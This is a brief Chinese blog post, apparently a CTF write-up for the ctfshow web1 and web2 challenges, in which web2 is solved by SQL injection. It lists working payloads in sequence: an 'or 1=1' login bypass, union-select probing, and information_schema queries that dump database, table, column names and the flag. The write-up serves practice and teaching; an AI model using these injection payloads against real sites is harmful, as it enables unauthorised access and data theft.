本文主要是介绍ctfshow-WEB-web1和web2，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

wb1

直接看源码

web2

1、试试万能密码

 登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中得到显示位

admin'or 1=1#

2、进行测试，测试一下回显位置

a' union select 1,2,3 #

得到回显为2

3、

获取当前使用的数据库

a' union select 1,database(),3 #

4、进行爆表

a' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3#

4、进行爆字段

a' union select 1,
(select group_concat(column_name) from information_schema.columns
where table_schema='web2' and table_name='flag')
,3 #

5、获取flag表的数据

a'union select 1,(select flag from flag),3#

这篇关于ctfshow-WEB-web1和web2的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！